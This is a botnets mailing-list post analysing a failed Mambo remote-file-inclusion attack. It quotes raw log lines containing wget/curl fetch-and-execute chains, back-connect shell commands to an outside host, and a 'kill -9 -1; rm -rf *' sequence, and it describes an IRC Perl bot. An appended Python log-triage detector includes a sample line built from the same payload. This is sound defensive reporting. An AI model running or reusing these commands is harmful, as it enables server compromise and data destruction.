To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------
Greetings list,
This one I found on Undernet, a few moments ago. Here is the information:

Mambo attack attempt on the 28th, failed:

216.63.146.236 - - [28/Feb/2006:10:06:41 -0500] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.98.144.89/cmd.txt?&cmd=cd%20/tmp;wget%20216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;wget%20216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;cd%20/var/tmp;curl%20-o%20cback%20http://216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;curl%20-o%20dc.txt%20http://216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;echo%20YYY;echo| HTTP/1.1" 404 214

I noticed a set of commands after connecting to: 217.160.242.90:8081 via telnet, they are:

"kill -9 -1;wget 219.96.212.234/~maruyama/under;perl under;rm -rf *"

In analyzing: 219.96.212.234/~maruyama/under, it's a Perl bot which connects to:

Server: eu.undernet.org
Channel: #sex1234

The bot references "HSDDFOPJ" as the administrator, but if you look at the Perl text's heading you see the pseudonym "mihaiu", which happens to be in the channel's user list.

Userlist:
_______________________________________________
botnets mailing list
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
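An added example, not part of the original post: a log-triage sketch that picks requests like the Mambo attempt above out of an access log by flagging any query parameter whose value is itself a URL, then lists the superglobal-shadowing parameter names, the chained commands and the hosts the download steps would contact. The sample line is constructed with RFC 5737 documentation addresses; the function names and the assumption that commands arrive in a `cmd` parameter (as in the request above) are illustrative.

```python
import re
from urllib.parse import unquote

# Access-log prefix; the request target never contains a raw space.
LOG = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                 r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) ')
REMOTE = re.compile(r'^(?:https?|ftp)://([^/?#]+)', re.I)  # parameter value is a URL
SUPERGLOBAL = re.compile(r'^(?:GLOBALS|_(?:REQUEST|GET|POST|COOKIE|SERVER))\b')

# Constructed sample in the shape of the request above (documentation addresses).
SAMPLE = ('192.0.2.10 - - [28/Feb/2006:10:06:41 -0500] "GET /mambo/index2.php?'
          '_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&'
          'mosConfig_absolute_path=http://198.51.100.20/cmd.txt?&cmd=cd%20/tmp;'
          'wget%20203.0.113.7/cback;chmod%20744%20cback;'
          './cback%20203.0.113.9%208081;'
          'curl%20-o%20dc.txt%20http://203.0.113.7/dc.txt;'
          'perl%20dc.txt%20203.0.113.9%208081;echo%20YYY;echo| HTTP/1.1" 404 214')

def fetch_hosts(commands):
    """Hosts that the wget/curl steps would contact, in order of first use."""
    hosts = []
    for words in (c.split() for c in commands):
        if words and words[0] in ("wget", "curl"):
            for w in words[1:]:
                host = re.sub(r'^[a-z]+://', '', w, flags=re.I).split("/")[0]
                if "/" in w and host not in hosts:
                    hosts.append(host)
    return hosts

def analyse(line):
    """Return findings for a remote-include attempt, or None for other requests."""
    m = LOG.match(line)
    if not m or "?" not in m["target"]:
        return None
    params = {}
    for pair in m["target"].split("?", 1)[1].split("&"):
        key, _, value = pair.partition("=")
        params[unquote(key)] = unquote(value)
    includes = {k: REMOTE.match(v)[1] for k, v in params.items() if REMOTE.match(v)}
    if not includes:
        return None
    commands = [c.strip() for c in params.get("cmd", "").split(";") if c.strip()]
    return {"source": m["src"], "status": int(m["status"]),
            "include_hosts": includes,
            "superglobals": sorted(k for k in params if SUPERGLOBAL.match(k)),
            "commands": commands, "fetch_hosts": fetch_hosts(commands)}

if __name__ == "__main__":
    for key, value in analyse(SAMPLE).items():
        print(f"{key}: {value}")
```

Any legitimate parameter that carries a URL (a redirect target, for instance) is also flagged, so treat a hit as a lead to review together with the status code rather than as proof of compromise.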
